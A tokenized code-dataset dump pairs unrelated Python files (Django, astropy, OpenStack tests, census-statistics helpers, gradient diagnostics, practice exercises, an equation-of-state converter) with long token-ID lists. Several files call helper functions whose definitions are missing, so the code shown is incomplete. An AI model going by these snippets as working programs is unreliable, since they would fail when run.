content
stringlengths
1
1.05M
input_ids
listlengths
1
883k
ratio_char_token
float64
1
22.9
token_count
int64
1
883k
# coding=utf-8 # Copyright 2021 Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Unit tests for title_word_order_optimizer.""" from absl.testing import parameterized import unittest.mock as mock from optimizers_builtin import title_word_order_optimizer from test_data import requests_bodies from util import app_util import constants # GPC ID IS 201 _PROPER_GPC_CATEGORY_EN = 'Apparel & Accessories > Jewelry > Watches' # GPC ID is 201 _PROPER_GPC_CATEGORY_JA = (' > ' ' > ') # GPC ID is 5598 _GPC_CATEGORY_LEVEL_4_JA = (' > ' ' > > ' '') _MAX_WMM_MOVE_THRESHOLD_EN = 25 _MAX_WMM_MOVE_THRESHOLD_JA = 12
[ 2, 19617, 28, 40477, 12, 23, 198, 2, 15069, 33448, 3012, 11419, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351,...
2.685969
449
from django.contrib.auth.models import User from django.db import models from django.utils.timezone import now
[ 6738, 42625, 14208, 13, 3642, 822, 13, 18439, 13, 27530, 1330, 11787, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 6738, 42625, 14208, 13, 26791, 13, 2435, 11340, 1330, 783, 628, 628, 628, 628, 198 ]
3.305556
36
from keras.models import Sequential from keras.layers import Dense, Dropout
[ 6738, 41927, 292, 13, 27530, 1330, 24604, 1843, 198, 6738, 41927, 292, 13, 75, 6962, 1330, 360, 1072, 11, 14258, 448, 628 ]
3.5
22
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import random from unittest import mock import uuid from cinderclient import api_versions from openstackclient.tests.unit.compute.v2 import fakes as compute_fakes from openstackclient.tests.unit import fakes from openstackclient.tests.unit.identity.v3 import fakes as identity_fakes from openstackclient.tests.unit import utils from openstackclient.tests.unit.volume.v2 import fakes as volume_v2_fakes # TODO(stephenfin): Check if the responses are actually the same FakeVolume = volume_v2_fakes.FakeVolume FakeVolumeType = volume_v2_fakes.FakeVolumeType
[ 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 345, 743, 198, 2, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 921, 743, 7330, 198, 2, 257, 4866, 286, 262, 13789, 379, 198, 2,...
3.560897
312
# Licensed under a 3-clause BSD style license - see LICENSE.rst from __future__ import absolute_import, division, print_function, unicode_literals import numpy as np from numpy.testing import assert_allclose from astropy.coordinates import Angle from astropy.tests.helper import pytest, assert_quantity_allclose from astropy.units import Quantity from astropy.wcs import WCS from ...utils.testing import requires_dependency, requires_data from ...datasets import FermiGalacticCenter from ...image import make_header from ...irf import EnergyDependentTablePSF from ...spectrum.powerlaw import power_law_evaluate from .. import SkyCube, compute_npred_cube, convolve_cube def make_test_cubes(energies, nxpix, nypix, binsz): """Makes exposure and spectral cube for tests. Parameters ---------- energies : `~astropy.units.Quantity` Quantity 1D array of energies of cube layers nxpix : int Number of pixels in x-spatial direction nypix : int Number of pixels in y-spatial direction binsz : float Spatial resolution of cube, in degrees per pixel Returns ------- exposure_cube : `~gammapy.sky_cube.SkyCube` Cube of uniform exposure = 1 cm^2 s sky_cube : `~gammapy.sky_cube.SkyCube` Cube of differential fluxes in units of cm^-2 s^-1 GeV^-1 sr^-1 """ header = make_header(nxpix, nypix, binsz) header['NAXIS'] = 3 header['NAXIS3'] = len(energies) header['CDELT3'] = 1 header['CRVAL3'] = 1 header['CRPIX3'] = 1 wcs = WCS(header) data_array = np.ones((len(energies), 10, 10)) exposure_cube = SkyCube(data=Quantity(data_array, 'cm2 s'), wcs=wcs, energy=energies) flux = power_law_evaluate(energies.value, 1, 2, 1) flux = Quantity(flux, '1/(cm2 s GeV sr)') flux_array = np.zeros_like(data_array) for i in np.arange(len(flux)): flux_array[i] = flux.value[i] * data_array[i] sky_cube = SkyCube(data=Quantity(flux_array, flux.unit), wcs=wcs, energy=energies) return exposure_cube, sky_cube
[ 2, 49962, 739, 257, 513, 12, 565, 682, 347, 10305, 3918, 5964, 532, 766, 38559, 24290, 13, 81, 301, 198, 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 11, 7297, 11, 3601, 62, 8818, 11, 28000, 1098, 62, 17201, 874, 198, 11748, 299,...
2.56044
819
# Generated by Django 2.2.16 on 2020-12-13 02:28 from django.db import migrations
[ 2, 2980, 515, 416, 37770, 362, 13, 17, 13, 1433, 319, 12131, 12, 1065, 12, 1485, 7816, 25, 2078, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 628 ]
2.8
30
### A module containing various utilities used at various points throughout the processes of submitting and analyzing problems ### import os import json import subprocess import hashlib import sys import random import string from .output_processor import process_output from . import code_templates def make_file(path, code, problem_data): """Function to create script that is used for verification and profiling purposes Returns nothing, writes to disk""" ctemps = code_templates.get_ctemp_dict() program_text = code input_type = list(problem_data["metadata"]["input_type"].keys())[0] main_function = problem_data["metadata"]["main_function"] init_data = problem_data["init_data"] is_init_data = problem_data["metadata"]["init_data"] is_inputs = problem_data["metadata"]["inputs"] with open(path, 'w') as f: write_prequel(f) for line in program_text: split_line = line.split() if len(split_line) > 0 and line.split()[0] == "def": func_name = line.split()[1].split("(")[0] if func_name == main_function: fname = func_name f.write("{0}\n".format(line)) if not line.endswith("\n"): f.write("\n") write_sequel(f, fname) def gen_sample_outputs(filename, problem_data, init_data=None, input_type="default"): """Utility function invoked whenever a reference problem is submitted Returns a list of outputs that are subsequently stored in DB as field associated with given problem""" inputs = problem_data["inputs"] platform = sys.platform.lower() SAMPUP_TIMEOUT = "8" SAMPUP_MEMOUT = "1000" timeout_cmd = "gtimeout {0}".format(SAMPUP_TIMEOUT) if platform == "darwin" else "timeout {0} -m {1}".format(SAMPUP_TIMEOUT, SAMPUP_MEMOUT) if platform == "linux" or platform == "linux2" else "" base_cmd = "{0} python".format(timeout_cmd) outputs = [] if input_type == "default": programmatic_inputs = inputs if inputs is not None: for inp in programmatic_inputs: input_arg = json.dumps(inp) output = process_output(base_cmd, filename, input_arg=input_arg, init_data=init_data) ### uncomment below line for 
debugging # print("CSO =>", cleaned_split_output) outputs.append(output) else: output = process_output(base_cmd, filename, init_data=init_data) ### uncomment below line for debugging # print("CSO =>", cleaned_split_output) outputs.append(output) elif input_type == "file": for script in inputs: output = process_output(base_cmd, filename, input_arg=script, init_data=init_data) ### uncomment below line for debugging # print("CSO =>", cleaned_split_output) outputs.append(output) try: os.remove(script) except: pass return outputs def generate_input(input_type, input_length, num_tests): """Self-explanatory utility function that generates test input for a submitted reference problem based on metadata specifications Returns jsonified list of inputs""" global_inputs = [] for i in range(num_tests): if input_type == "integer": inp_list = [random.randint(1, 1000) for x in range(input_length)] elif input_type == "float": inp_list = [round(random.uniform(0.0, 1000.0), 2) for x in range(input_length)] elif input_type == "string": inp_list = [random_string(random.randint(1, 10)) for x in range(input_length)] global_inputs.append(inp_list) return global_inputs
[ 21017, 317, 8265, 7268, 2972, 20081, 973, 379, 2972, 2173, 3690, 262, 7767, 286, 24353, 290, 22712, 2761, 44386, 198, 198, 11748, 28686, 198, 11748, 33918, 198, 11748, 850, 14681, 198, 11748, 12234, 8019, 198, 11748, 25064, 198, 11748, 47...
2.469079
1,520
from __future__ import division from collections import OrderedDict from sqlalchemy import create_engine, MetaData, func from sqlalchemy.orm import sessionmaker, class_mapper from django.conf import settings from django.db.backends.base.creation import TEST_DATABASE_PREFIX from django.db import connection if settings.TESTING: # Hack to ensure the sqlalchemy database name matches the Django one # during testing url = settings.DATABASE_URL parts = url.split("/") # use the test database name db_name = connection.settings_dict.get('TEST', {}).get('NAME') if db_name is None: db_name = TEST_DATABASE_PREFIX + parts[-1] parts[-1] = db_name url = '/'.join(parts) _engine = create_engine(url) else: _engine = create_engine(settings.DATABASE_URL) # See http://docs.sqlalchemy.org/en/latest/core/constraints.html#constraint-naming-conventions naming_convention = { "ix": 'ix_%(column_0_label)s', "uq": "uq_%(table_name)s_%(column_0_name)s", "ck": "ck_%(table_name)s_%(constraint_name)s", "fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s", "pk": "pk_%(table_name)s" } _metadata = MetaData(bind=_engine, naming_convention=naming_convention) _Session = sessionmaker(bind=_engine) def capitalize(s): """ Capitalize the first char of a string, without affecting the rest of the string. This differs from `str.capitalize` since the latter also lowercases the rest of the string. 
""" if not s: return s return ''.join([s[0].upper(), s[1:]]) def percent(num, denom, places=2): if denom == 0: return 0 else: return round(num / denom * 100, places) def ratio(num, denom, places=2): if denom == 0: return 0 else: return round(num / denom, places) def add_metadata(data, table): if 'metadata' not in data: data['metadata'] = {} # this might be a SQLAlchemy model that is linked back to # a data table if hasattr(table, 'data_tables'): table = table.data_tables[0] data['metadata']['table_id'] = table.id if table.universe: data['metadata']['universe'] = table.universe if table.year: data['metadata']['year'] = table.year # dictionaries that merge_dicts will merge MERGE_KEYS = set(['values', 'numerators', 'error']) def calculate_median(objects, field_name): ''' Calculates the median where obj.total is the distribution count and getattr(obj, field_name) is the distribution segment. Note: this function assumes the objects are sorted. ''' total = 0 for obj in objects: total += obj.total half = total / 2.0 counter = 0 for i, obj in enumerate(objects): counter += obj.total if counter > half: if counter - half == 1: # total must be even (otherwise counter - half ends with .5) return (float(getattr(objects[i - 1], field_name)) + float(getattr(obj, field_name))) / 2.0 return float(getattr(obj, field_name)) elif counter == half: # total must be even (otherwise half ends with .5) return (float(getattr(obj, field_name)) + float(getattr(objects[i + 1], field_name))) / 2.0 def calculate_median_stat(stats): ''' Calculates the stat (key) that lies at the median for stat data from the output of get_stat_data. Note: this function assumes the objects are sorted. 
''' total = 0 keys = [k for k in stats.iterkeys() if k != 'metadata'] total = sum(stats[k]['numerators']['this'] for k in keys) half = total / 2.0 counter = 0 for key in keys: counter += stats[key]['numerators']['this'] if counter >= half: return key def merge_dicts(this, other, other_key): ''' Recursively merges 'other' dict into 'this' dict. In particular it merges the leaf nodes specified in MERGE_KEYS. ''' for key, values in this.iteritems(): if key in MERGE_KEYS: if key in other: values[other_key] = other[key]['this'] elif isinstance(values, dict): merge_dicts(values, other[key], other_key) def group_remainder(data, num_items=4, make_percentage=True, remainder_name="Other"): ''' This function assumes data is an OrderedDict instance. It iterates over the dict items, grouping items with index >= num_items - 1 together under key remainder_name. If make_percentage = True, the 'values' dict contains percentages and the 'numerators' dict the totals. Otherwise 'values' contains the totals. 
''' num_key = 'numerators' if make_percentage else 'values' total_all = dict((k, 0.0) for k in data.values()[0][num_key].keys()) total_other = total_all.copy() other_dict = { "name": remainder_name, "error": {"this": 0.0}, "numerator_errors": {"this": 0.0}, num_key: total_other, } cutoff = num_items - 2 for i, (key, values) in enumerate(data.items()): if key == 'metadata': continue for k, v in values[num_key].iteritems(): total_all[k] += v if i > cutoff: del data[key] data.setdefault(remainder_name, other_dict) for k, v in values[num_key].iteritems(): total_other[k] += v if make_percentage: for key, values in data.iteritems(): if key != 'metadata': values['values'] = dict((k, percent(v, total_all[k])) for k, v in values['numerators'].iteritems()) def get_objects_by_geo(db_model, geo, session, fields=None, order_by=None, only=None, exclude=None, data_table=None): """ Get rows of statistics from the stats mode +db_model+ for a particular geography, summing over the 'total' field and grouping by +fields+. Filters to include +only+ and ignore +exclude+, if given. 
""" data_table = data_table or db_model.data_tables[0] if fields is None: fields = [c.key for c in class_mapper(db_model).attrs if c.key not in ['geo_code', 'geo_level', 'geo_version', 'total']] fields = [getattr(db_model, f) for f in fields] objects = session\ .query(func.sum(db_model.total).label('total'), *fields)\ .group_by(*fields)\ .filter(db_model.geo_code == geo.geo_code)\ .filter(db_model.geo_level == geo.geo_level)\ .filter(db_model.geo_version == geo.version) if only: for k, v in only.iteritems(): objects = objects.filter(getattr(db_model, k).in_(v)) if exclude: for k, v in exclude.iteritems(): objects = objects.filter(getattr(db_model, k).notin_(v)) if order_by is not None: attr = order_by is_desc = False if order_by[0] == '-': is_desc = True attr = attr[1:] if attr == 'total': if is_desc: attr = attr + ' DESC' else: attr = getattr(db_model, attr) if is_desc: attr = attr.desc() objects = objects.order_by(attr) objects = objects.all() if len(objects) == 0: raise LocationNotFound("%s for geography %s version '%s' not found" % (db_model.__table__.name, geo.geoid, geo.version)) return objects def get_stat_data(fields, geo, session, order_by=None, percent=True, total=None, table_fields=None, table_name=None, only=None, exclude=None, exclude_zero=False, recode=None, key_order=None, table_dataset=None, percent_grouping=None, slices=None): """ This is our primary helper routine for building a dictionary suitable for a place's profile page, based on a statistic. It sums over the data for ``fields`` in the database for the place identified by ``geo`` and calculates numerators and values. If multiple fields are given, it creates nested result dictionaries. Control the rows that are included or ignored using ``only``, ``exclude`` and ``exclude_zero``. The field values can be recoded using ``recode`` and and re-ordered using ``key_order``. :param fields: the census field to build stats for. Specify a list of fields to build nested statistics. 
If multiple fields are specified, then the values of parameters such as ``only``, ``exclude`` and ``recode`` will change. These must be fields in `api.models.census.census_fields`, e.g. 'highest educational level' :type fields: str or list :param geo: the geograhy object :param dbsession session: sqlalchemy session :param str order_by: field to order by, or None for default, eg. '-total' :param bool percent: should we calculate percentages, or just sum raw values? :param list percent_grouping: when calculating percentages, which fields should rows be grouped by? Default: none of them -- calculate each entry as a percentage of the whole dataset. Ignored unless ``percent`` is ``True``. :param list table_fields: list of fields to use to find the table, defaults to `fields` :param int total: the total value to use for percentages, or None to total columns automatically :param str table_name: override the table name, otherwise it's calculated from the fields and geo_level :param list only: only include these field values. If ``fields`` has many items, this must be a dict mapping field names to a list of strings. :type only: dict or list :param exclude: ignore these field values. If ``fields`` has many items, this must be a dict mapping field names to a list of strings. Field names are checked before any recoding. :type exclude: dict or list :param bool exclude_zero: ignore fields that have a zero or null total :param recode: function or dict to recode values of ``key_field``. If ``fields`` is a singleton, then the keys of this dict must be the values to recode from, otherwise they must be the field names and then the values. If this is a lambda, it is called with the field name and its value as arguments. :type recode: dict or lambda :param key_order: ordering for keys in result dictionary. If ``fields`` has many items, this must be a dict from field names to orderings. The default ordering is determined by ``order``. 
:type key_order: dict or list :param str table_dataset: dataset used to help find the table if ``table_name`` isn't given. :param list slices: return only a slice of the final data, by choosing a single value for each field in the field list, as specified in the slice list. :return: (data-dictionary, total) """ from .tables import FieldTable if not isinstance(fields, list): fields = [fields] n_fields = len(fields) many_fields = n_fields > 1 if order_by is None: order_by = fields[0] if only is not None: if not isinstance(only, dict): if many_fields: raise ValueError("If many fields are given, then only must be a dict. I got %s instead" % only) else: only = {fields[0]: set(only)} if exclude is not None: if not isinstance(exclude, dict): if many_fields: raise ValueError("If many fields are given, then exclude must be a dict. I got %s instead" % exclude) else: exclude = {fields[0]: set(exclude)} if key_order: if not isinstance(key_order, dict): if many_fields: raise ValueError("If many fields are given, then key_order must be a dict. 
I got %s instead" % key_order) else: key_order = {fields[0]: key_order} else: key_order = {} if recode: if not isinstance(recode, dict) or not many_fields: recode = dict((f, recode) for f in fields) table_fields = table_fields or fields # get the table and the model if table_name: data_table = FieldTable.get(table_name) else: data_table = FieldTable.for_fields(table_fields, table_dataset) if not data_table: ValueError("Couldn't find a table that covers these fields: %s" % table_fields) objects = get_objects_by_geo(data_table.model, geo, session, fields=fields, order_by=order_by, only=only, exclude=exclude, data_table=data_table) if total is not None and many_fields: raise ValueError("Cannot specify a total if many fields are given") if total and percent_grouping: raise ValueError("Cannot specify a total if percent_grouping is given") if total is None and percent and data_table.total_column is None: # The table doesn't support calculating percentages, but the caller # has asked for a percentage without providing a total value to use. # Either specify a total, or specify percent=False raise ValueError("Asking for a percent on table %s that doesn't support totals and no total parameter specified." % data_table.id) # sanity check the percent grouping if percent: if percent_grouping: for field in percent_grouping: if field not in fields: raise ValueError("Field '%s' specified in percent_grouping must be in the fields list." % field) # re-order percent grouping to be same order as in the field list percent_grouping = [f for f in fields if f in percent_grouping] else: percent_grouping = None denominator_key = getattr(data_table, 'denominator_key') root_data = OrderedDict() running_total = 0 group_totals = {} grand_total = -1 def get_data_object(obj): """ Recurse down the list of fields and return the final resting place for data for this stat. 
""" data = root_data for i, field in enumerate(fields): key = getattr(obj, field) if recode and field in recode: key = get_recoded_key(recode, field, key) else: key = capitalize(key) # enforce key ordering the first time we see this field if (not data or data.keys() == ['metadata']) and field in key_order: for fld in key_order[field]: data[fld] = OrderedDict() # ensure it's there if key not in data: data[key] = OrderedDict() data = data[key] # default values for intermediate fields if data is not None and i < n_fields - 1: data['metadata'] = {'name': key} # data is now the dict where the end value is going to go if not data: data['name'] = key data['numerators'] = {'this': 0.0} return data # run the stats for the objects for obj in objects: if not obj.total and exclude_zero: continue if denominator_key and getattr(obj, data_table.fields[-1]) == denominator_key: grand_total = obj.total # don't include the denominator key in the output continue # get the data dict where these values must go data = get_data_object(obj) if not data: continue if obj.total is not None: data['numerators']['this'] += obj.total running_total += obj.total else: # TODO: sanity check this is the right thing to do for multiple fields with # nested nulls -- does aggregating over nulls treat them as zero, or should we # treat them as null? data['numerators']['this'] = None if percent_grouping: if obj.total is not None: group_key = tuple() for field in percent_grouping: key = getattr(obj, field) if recode and field in recode: # Group by recoded keys key = get_recoded_key(recode, field, key) group_key = group_key + (key,) data['_group_key'] = group_key group_totals[group_key] = group_totals.get(group_key, 0) + obj.total if grand_total == -1: grand_total = running_total if total is None else total # add in percentages calc_percent(root_data) if slices: for v in slices: root_data = root_data[v] add_metadata(root_data, data_table) return root_data, grand_total
[ 6738, 11593, 37443, 834, 1330, 7297, 198, 6738, 17268, 1330, 14230, 1068, 35, 713, 198, 198, 6738, 44161, 282, 26599, 1330, 2251, 62, 18392, 11, 30277, 6601, 11, 25439, 198, 6738, 44161, 282, 26599, 13, 579, 1330, 6246, 10297, 11, 1398,...
2.398057
7,102
from time import time from typing import * import torch from booster import Diagnostic from torch import Tensor from tqdm import tqdm from .utils import cosine, percentile, RunningMean, RunningVariance from ..estimators import GradientEstimator from ..models import TemplateModel def get_grads_from_tensor(model: TemplateModel, loss: Tensor, output: Dict[str, Tensor], tensor_id: str, mc: int, iw: int): """ Compute the gradients given a `tensor` on which was called `tensor.retain_graph()` Assumes `tensor` to have `tensor.shape[0] == bs * iw * mc` :param model: VAE model :param loss: loss value :param output: model's output: dict :param tensor_id: key of the tensor in the model output :param mc: number of outer Monte-Carlo samples :param iw: number of inner Importance-Weighted samples :return: gradient: Tensor of shape [D,] where D is the number of elements in `tensor` """ assert tensor_id in output.keys(), f"Tensor_id = `{tensor_id}` not in model's output" model.zero_grad() loss.sum().backward(create_graph=True, retain_graph=True) # get the tensor of interest tensors = output[tensor_id] if isinstance(output[tensor_id], list) else output[tensor_id] bs = tensors[0].shape[0] // (mc * iw) # get the gradients, flatten and concat across the feature dimension gradients = [p.grad for p in tensors] assert not any( [g is None for g in gradients]), f"{sum([int(g is None) for g in gradients])} tensors have no gradients. " \ f"Use `tensor.retain_graph()` in your model to enable gradients. 
" \ f"tensor_id = `{tensor_id}`" # compute gradients estimate for each individual grads # sum individual gradients because x_expanded = x.expand(bs, mc, iw) gradients = torch.cat([g.view(bs, mc * iw, -1).sum(1) for g in gradients], 1) # return an MC average of the grads return gradients.mean(0) def get_grads_from_parameters(model: TemplateModel, loss: Tensor, key_filter: str = ''): """ Return the gradients for the parameters matching the `key_filter` :param model: VAE model :param loss: loss value :param key_filter: filter value (comma separated values accepted (e.g. "A,b")) :return: Tensor of shape [D,] where `D` is the number of parameters """ key_filters = key_filter.split(',') params = [p for k, p in model.named_parameters() if any([(_key in k) for _key in key_filters])] assert len(params) > 0, f"No parameters matching filter = `{key_filters}`" model.zero_grad() # backward individual gradients \nabla L[i] loss.mean().backward(create_graph=True, retain_graph=True) # gather gradients for each parameter and concat such that each element across the dim 1 is a parameter grads = [p.grad.view(-1) for p in params if p.grad is not None] return torch.cat(grads, 0) def get_gradients_statistics(estimator: GradientEstimator, model: TemplateModel, x: Tensor, mc_samples: int = 100, key_filter: str = 'inference_network', oracle_grad: Optional[Tensor] = None, return_grads: bool = False, compute_dsnr: bool = True, samples_per_batch: Optional[int] = None, eps: float = 1e-15, tqdm: Callable = tqdm, **config: Dict) -> Tuple[Diagnostic, Dict]: """ Compute the gradients and return the statistics (Variance, Magnitude, SNR, DSNR) If an `oracle` gradient is available: compute the cosine similarity with the oracle and the gradient estimate (direction) The Magnitude, Variance and SNR are defined parameter-wise. All return values are average over the D parameters with Variance > eps. 
For instance, the returned SNR is * SNR = 1/D \sum_d SNR_d Each MC sample is computed sequentially and the mini-batch `x` will be split into chuncks if a value `samples_per_batch` if specified and if `samples_per_batch < x.size(0) * mc * iw`. :param estimator: Gradient Estimator :param model: VAE model :param x: mini-batch of observations :param mc_samples: number of Monte-Carlo samples :param key_filter: key matching parameters names in the model :param oracle_grad: true direction of the gradients [Optional] :param return_grads: return all gradients in the `meta` output directory if set to `True` :param compute_dsnr: compute the Directional SNR if set to `True` :param samples_per_batch: max. number of individual samples `bs * mc * iw` per mini-batch [Optional] :param eps: minimum Variance value used for filtering :param config: config dictionary for the estimator :param tqdm: custom `tqdm` function :return: output : Diagnostic = {'grads' : {'variance': .., 'magnitude': .., 'snr': .., 'dsnr' .., 'direction': cosine similarity with the oracle, 'keep_ratio' : ratio of parameter-wise gradients > epsilon}} 'snr': {'percentiles', 'mean', 'min', 'max'} }, meta : additional data including the gradients values if `return_grads` """ _start = time() grads_dsnr = None grads_mean = RunningMean() grads_variance = RunningVariance() if oracle_grad is not None: grads_dir = RunningMean() all_grads = None # compute each MC sample sequentially for i in tqdm(range(mc_samples), desc="Gradients Analysis"): # compute number of chuncks based on the capacity `samples_per_batch` if samples_per_batch is None: chuncks = 1 else: bs = x.size(0) mc = estimator.config['mc'] iw = estimator.config['iw'] # infer number of chunks total_samples = bs * mc * iw chuncks = max(1, -(-total_samples // samples_per_batch)) # ceiling division # compute mini-batch gradient by chunck if `x` is large gradients = RunningMean() for k, x_ in enumerate(x.chunk(chuncks, dim=0)): model.eval() model.zero_grad() # 
forward, backward to compute the gradients loss, diagnostics, output = estimator(model, x_, backward=False, **config) # gather mini-batch gradients if 'tensor:' in key_filter: tensor_id = key_filter.replace("tensor:", "") gradients_ = get_grads_from_tensor(model, loss, output, tensor_id, estimator.mc, estimator.iw) else: gradients_ = get_grads_from_parameters(model, loss, key_filter=key_filter) # move to cpu gradients_ = gradients_.detach().cpu() # update average gradients.update(gradients_, k=x_.size(0)) # gather statistics with torch.no_grad(): gradients = gradients() if return_grads or compute_dsnr: all_grads = gradients[None] if all_grads is None else torch.cat([all_grads, gradients[None]], 0) grads_mean.update(gradients) grads_variance.update(gradients) # compute the statistics with torch.no_grad(): # compute statistics for each data point `x_i` grads_variance = grads_variance() grads_mean = grads_mean() # compute signal-to-noise ratio. see `tighter variational bounds are not necessarily better` (eq. 4) grad_var_sqrt = grads_variance.pow(0.5) clipped_variance_sqrt = grad_var_sqrt.clamp(min=eps) grads_snr = grads_mean.abs() / (clipped_variance_sqrt) # compute DSNR, see `tighter variational bounds are not necessarily better` (eq. 
12) if compute_dsnr: u = all_grads.mean(0, keepdim=True) u /= u.norm(dim=1, keepdim=True, p=2) g_parallel = u * (u * all_grads).sum(1, keepdim=True) g_perpendicular = all_grads - g_parallel grads_dsnr = g_parallel.norm(dim=1, p=2) / (eps + g_perpendicular.norm(dim=1, p=2)) # compute grad direction: cosine similarity between the gradient estimate and the oracle if oracle_grad is not None: grads_dir = cosine(grads_mean, oracle_grad, dim=-1) # reinitialize grads model.zero_grad() # reduce fn: keep only parameter with variance > 0 mask = (grads_variance > eps).float() _reduce = lambda x: (x * mask).sum() / mask.sum() output = Diagnostic({'grads': { 'variance': _reduce(grads_variance), 'magnitude': _reduce(grads_mean.abs()), 'snr': _reduce(grads_snr), 'dsnr': grads_dsnr.mean() if grads_dsnr is not None else 0., 'keep_ratio': mask.sum() / torch.ones_like(mask).sum() }, 'snr': { 'p25': percentile(grads_snr, q=0.25), 'p50': percentile(grads_snr, q=0.50), 'p75': percentile(grads_snr, q=0.75), 'p5': percentile(grads_snr, q=0.05), 'p95': percentile(grads_snr, q=0.95), 'min': grads_snr.min(), 'max': grads_snr.max(), 'mean': grads_snr.mean()} }) if oracle_grad is not None: output['grads']['direction'] = grads_dir.mean() # additional data: raw grads, and mean,var,snr for each parameter separately meta = { 'grads': all_grads, 'expected': grads_mean, 'magnitude': grads_mean.abs(), 'var': grads_variance, 'snr': grads_snr, } return output, meta
[ 6738, 640, 1330, 640, 198, 6738, 19720, 1330, 1635, 198, 198, 11748, 28034, 198, 6738, 30430, 1330, 31549, 15132, 198, 6738, 28034, 1330, 309, 22854, 198, 6738, 256, 80, 36020, 1330, 256, 80, 36020, 198, 198, 6738, 764, 26791, 1330, 861...
2.251931
4,402
if __name__ == '__main__': main()
[ 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 1388, 3419 ]
2.166667
18
# -*- coding: utf-8 -*- import re # from pyltp import Segmentor import jieba.posseg as pseg import jieba import os import sys import json import math # import kenlm import nltk from collections import Counter # dataSplit('TNewsSegafter2.txt', 32) dataSplit('TNewsSegafter1.txt', 32)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 302, 198, 2, 422, 12972, 2528, 79, 1330, 1001, 5154, 273, 198, 11748, 474, 494, 7012, 13, 1930, 325, 70, 355, 15838, 70, 198, 11748, 474, 494, 7012, 198, 11748,...
2.75
104
""" Practice problems, Python fundamentals 1 -- Solutions @authors: Balint Szoke, Daniel Csaba @date: 06/02/2017 """ #------------------------------------------------------- # 1) Solution good_string = "Sarah's code" #or good_string = """Sarah's code""" #------------------------------------------------------- # 2) Solution i = 1234 list(str(i)) #------------------------------------------------------- # 3) Solution year = '2016' next_year = str(int(year) + 1) #------------------------------------------------------- # 4) Solution x, y = 3, 'hello' print(x, y) z = x x = y y = z print(x, y) #------------------------------------------------------- # 5) Solution name = 'Jones' print(name.upper()) #------------------------------------------------------- # 6) Solution name = 'Ulysses' print(name.count('s')) #------------------------------------------------------- # 7) Solution long_string = 'salamandroid' long_string = long_string.replace('a', '*') print(long_string) #------------------------------------------------------- # 8) Solution ll = [1, 2, 3, 4, 5] ll.reverse() print(ll) #ll.pop(1) # or better ll.pop(ll.index(4)) print(ll) ll.append(1.5) print(ll) ll.sort() print(ll) #%% #------------------------------------------------------- # 9) Solution number = "32,054.23" number_no_comma = number.replace(',', '') number_float = float(number_no_comma) print(number_float) #or print(float(number.replace(',', ''))) #------------------------------------------------------- # 10) Solution firstname_lastname = 'john_doe' firstname, lastname = firstname_lastname.split('_') Firstname = firstname.capitalize() Lastname = lastname.capitalize() print(Firstname, Lastname) #------------------------------------------------------- # 11-12) Solution l = [0, 1, 2, 4, 5] index = l.index(4) l.insert(index, 3) print(l) #------------------------------------------------------- # 13) Solution s = 'www.example.com' s = s.lstrip('w.') s = s.rstrip('.c') # or in a single line 
(s.lstrip('w.')).rstrip('.com') #------------------------------------------------------- # 14) Solution link = 'https://play.spotify.com/collection/albums' splitted_link = link.rsplit('/', 1) print(splitted_link[0]) #or link.rsplit('/', 1)[0] #------------------------------------------------------- # 15) Solution amount = "32.054,23" ms = amount.maketrans(',.', '.,') amount = amount.translate(ms) print(amount)
[ 37811, 198, 49515, 501, 2761, 11, 11361, 33099, 352, 1377, 23555, 198, 198, 31, 41617, 25, 8528, 600, 27974, 2088, 11, 7806, 327, 82, 15498, 198, 31, 4475, 25, 9130, 14, 2999, 14, 5539, 198, 37811, 198, 198, 2, 3880, 19351, 6329, 22...
3.133848
777
""" This is a python script that converts u(rho, T), P(rho, T), Cs(rho,T), S(rho, T) to T(rho, u), P(rho, u), Cs(rho, u), S(rho, u), which is more useful for SPH calculations """ import matplotlib.pyplot as plt from collections import OrderedDict import numpy as np import pandas as pd import csv import sys from scipy.interpolate import interp1d from scipy import interpolate def recalculateEnergies(d, grid_number, min_energy, delta): """ For each density sample, we want the same exponential energy grid :param d: :param grid_number: :param min_energy: :param delta: :return: """ densities = d.keys() new_energies = [] for i in range(0, grid_number): new_energy = min_energy * (delta**i) new_energies.append(new_energy) for i in densities: d[i].update({'Energy (J/kg)': new_energies}) return d nu = 120 # number of the grid for the internal energy (exponential) infile_path = 'granite.table.csv' empty_lines = emptyLineIndices(f=infile_path) sorted_dict = chunkFile(f=infile_path, emtpy_lines=empty_lines) densities = sorted_dict.keys() infile_df = pd.read_csv(infile_path) energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])] min_energy = min(energy) max_energy = max(energy) delta = (min_energy / max_energy)**(1/(nu-1)) sorted_dict = recalculateEnergies(d=sorted_dict, grid_number=nu, min_energy=min_energy, delta=delta) for i in densities: energies = sorted_dict[i]['Energy (J/kg)'] temperatures = sorted_dict[i]['Temperature (K)'] pressures = sorted_dict[i]['Pressure (Pa)'] sound_speeds = sorted_dict[i]['Sound speed (m/s)'] entropies = sorted_dict[i]['Entropy (J/kg/K)'] f_temperature = interpolate.interp1d(energies, temperatures, kind='linear', fill_value='extrapolate') 